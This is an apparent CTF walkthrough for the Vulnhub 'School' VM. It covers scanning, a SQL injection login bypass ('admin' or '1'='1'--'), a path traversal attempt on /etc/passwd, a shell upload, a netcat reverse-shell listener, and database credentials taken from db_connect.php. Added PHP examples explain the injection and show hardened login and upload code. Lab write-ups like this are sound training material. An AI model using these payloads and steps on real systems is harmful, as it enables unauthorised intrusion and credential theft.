Vulnhub: School VM Detailed Walkthrough
阿新 • Published: 2022-11-29
School
Identify the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.70.0/16 | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP               At MAC Address      Count  Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1     0a:00:27:00:00:11   1      60   Unknown vendor
192.168.56.100   08:00:27:36:fe:47   2      120  PCS Systemtechnik GmbH
192.168.56.122   08:00:27:ac:cb:15   1      60   PCS Systemtechnik GmbH
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.122 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 22:05 EST
Nmap scan report for localhost (192.168.56.122)
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
23/tcp open  telnet?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns, tn3270:
|_    Verification Code:
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:AC:CB:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
The NMAP scan shows that the target host has 3 open ports: 22 (SSH), 23 (Telnet) and 80 (HTTP).
Get Access
Access port 23:
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ telnet 192.168.56.122
Trying 192.168.56.122...
Connected to 192.168.56.122.
Escape character is '^]'.
Verification Code:
�@�Connection closed by foreign host.
No session is established; a verification code is required?
Visiting port 80 in a browser redirects automatically to the student login portal:
http://192.168.56.122/student_attendance/login.php
So is there an administrator portal as well?
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ nikto -h http://192.168.56.122
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.122
+ Target Hostname: 192.168.56.122
+ Target Port: 80
+ Start Time: 2022-11-28 22:11:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /student_attendance
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-11-28 22:12:08 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto did not give any further information of value.
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/28 22:13:28 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220249 / 220561 (99.86%)
===============================================================
2022/11/28 22:14:09 Finished
===============================================================
Gobuster turned up no directories; next, scan for files with the following extensions:
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,html,php
[+] Timeout: 10s
===============================================================
2022/11/28 22:14:21 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 0] [--> /student_attendance]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101274 / 1102805 (99.86%)
===============================================================
2022/11/28 22:18:25 Finished
===============================================================
The directory and file scans gave nothing of value, so the next step is to break the user login. Before resorting to brute force, check whether SQL injection can bypass authentication.
Enter the following in the username field: admin' or '1'='1'--
This logs in successfully, and as administrator.
Looking at the URL, there may be a local file inclusion vulnerability; try it:
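The bypass works because the login query is assembled by string concatenation. As an added example (not the School VM's own code; the users table, its columns and the md5 hashing of the stored password are assumed), here is that pattern beside the prepared-statement form that keeps the input as data:

```php
<?php
// Added example, not code from the target application. Assumed schema:
// table `users` with columns id, username, password, type.

// VULNERABLE: $username is spliced into the SQL text. With the input
//   admin' or '1'='1'--
// the closing quote ends the literal, `or '1'='1'` makes the WHERE clause true
// for every row, and `--` comments out the password check, so the first user
// (here an administrator) is returned. Note: MySQL only treats `--` as a
// comment when whitespace follows it, so the payload is normally sent with a
// trailing space.
function login_vulnerable(mysqli $conn, string $username, string $password): ?array {
    $sql = "SELECT id, username, type FROM users "
         . "WHERE username = '$username' AND password = '" . md5($password) . "'";
    $res = $conn->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// FIXED: the parameter is bound, never parsed as SQL, and the password is
// verified in PHP against a password_hash() value instead of inside the query.
function login_fixed(mysqli $conn, string $username, string $password): ?array {
    $stmt = $conn->prepare(
        "SELECT id, username, type, password FROM users WHERE username = ?"
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;   // unknown user or wrong password: same answer for both
    }
    unset($row['password']);
    return $row;
}
```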
http://192.168.56.122/student_attendance/index.php?page=home
Tried the following:
http://192.168.56.122/student_attendance/index.php?page=../../../../../../etc/passwd
The file contents were not returned, so next see whether shell.php can be uploaded. No upload location was found at first, but the page source contains a comment:
<script>
$('#manage_my_account').click(function(){
uni_modal("Manage Account","manage_user.php?id=1&mtype=own")
})
</script>
<style>
.collapse a{
text-indent:10px;
}
nav#sidebar{
/*background: url(assets/uploads/1604743980_shell.php) !important*/
}
</style>
<nav id="sidebar" class='mx-lt-5 bg-dark' >
<div class="sidebar-list">
<a href="index.php?page=home" class="nav-item nav-home"><span class='icon-field'><i class="fa fa-tachometer-alt "></i></span> Dashboard</a>
<a href="index.php?page=courses" class="nav-item nav-courses"><span class='icon-field'><i class="fa fa-th-list "></i></span> Course</a>
<a href="index.php?page=subjects" class="nav-item nav-subjects"><span class='icon-field'><i class="fa fa-book "></i></span> Subject</a>
<a href="index.php?page=class" class="nav-item nav-class"><span class='icon-field'><i class="fa fa-list-alt "></i></span> Class</a>
<a href="index.php?page=faculty" class="nav-item nav-faculty"><span class='icon-field'><i class="fa fa-user-tie "></i></span> Faculty</a>
<a href="index.php?page=students" class="nav-item nav-students"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Student</a>
<a href="index.php?page=class_subject" class="nav-item nav-class_subject"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Class per Subject</a>
<a href="index.php?page=check_attendance" class="nav-item nav-check_attendance"><span class='icon-field'><i class="fa fa-tasks "></i></span> Check Attendance</a>
<a href="index.php?page=attendance_record" class="nav-item nav-attendance_record"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Record</a>
<a href="index.php?page=attendance_report" class="nav-item nav-attendance_report"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Report</a>
<a href="index.php?page=users" class="nav-item nav-users"><span class='icon-field'><i class="fa fa-users "></i></span> Users</a>
<!-- <a href="index.php?page=site_settings" class="nav-item nav-site_settings"><span class='icon-field'><i class="fa fa-cogs text-danger"></i></span> System Settings</a> -->
</div>
assets/uploads/1604743980_shell.php cannot be accessed, however.
Another comment: index.php?page=site_settings
http://192.168.56.122/student_attendance/index.php?page=site_settings
Here a file can be uploaded.
In the /uploads directory there is a shell.php file:
http://192.168.56.122/student_attendance/assets/uploads/
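The foothold depends on the site_settings upload accepting any file name and storing it where Apache executes PHP. An added example, not the VM's own code (the upload directory and the allowed image types are assumptions), of an upload handler that closes that path:

```php
<?php
// Added example, not code from the target application.
// Assumed: uploads land in assets/uploads and only logo/cover images are expected.
const UPLOAD_DIR = __DIR__ . '/assets/uploads';
const ALLOWED    = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];

// Stores one entry of $_FILES and returns the server-chosen file name.
// Throws on anything that is not a plain image with a single allowed extension.
function store_image(array $file): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // 1. Decide the type from the bytes, not from the client-supplied name or MIME.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = array_search($mime, ALLOWED, true);
    if ($ext === false) {
        throw new RuntimeException("rejected content type $mime");
    }
    // 2. The client name must be exactly one name and one allowed extension,
    //    so shell.php and double extensions such as logo.php.png are refused.
    $parts = explode('.', strtolower(basename($file['name'])));
    if (count($parts) !== 2 || !isset(ALLOWED[$parts[1]])) {
        throw new RuntimeException('rejected file name');
    }
    // 3. The server picks the stored name; nothing from the client reaches the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
```

Pair this with an Apache `<Directory>` block for the uploads path that sets `php_admin_flag engine off`, so that even a file that slips through is served as bytes rather than executed.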
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.122] 58406
Linux school 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
04:04:16 up 1:21, 0 users, load average: 0.00, 0.03, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@school:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
www-data@school:/$ cd /home
cd /home
www-data@school:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 7 2020 .
drwxr-xr-x 18 root root 4.0K Nov 3 2020 ..
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 fox
drwxr-xr-x 2 ppp ppp 4.0K Oct 10 2020 ppp
www-data@school:/home$ cd fox
cd fox
www-data@school:/home/fox$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 .
drwxr-xr-x 4 root root 4.0K Nov 7 2020 ..
lrwxrwxrwx 1 fox fox 9 Nov 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 fox fox 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 fox fox 3.5K Apr 18 2019 .bashrc
-rw-r--r-- 1 fox fox 807 Apr 18 2019 .profile
-rw-r--r-- 1 fox fox 33 Nov 7 2020 local.txt
www-data@school:/home/fox$ cat local.txt
cat local.txt
e4ed03b4852906b6cb716fc6ce0f9fd5
www-data@school:/home/fox$
www-data@school:/var/www/html/student_attendance$ cat db_connect.php
cat db_connect.php
<?php
$conn= new mysqli('localhost','fox','trallalleropititumpa','student_attendance_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@school:/var/www/html/student_attendance$
This file contains the database username and password. Could they also be the system username and password? They are not.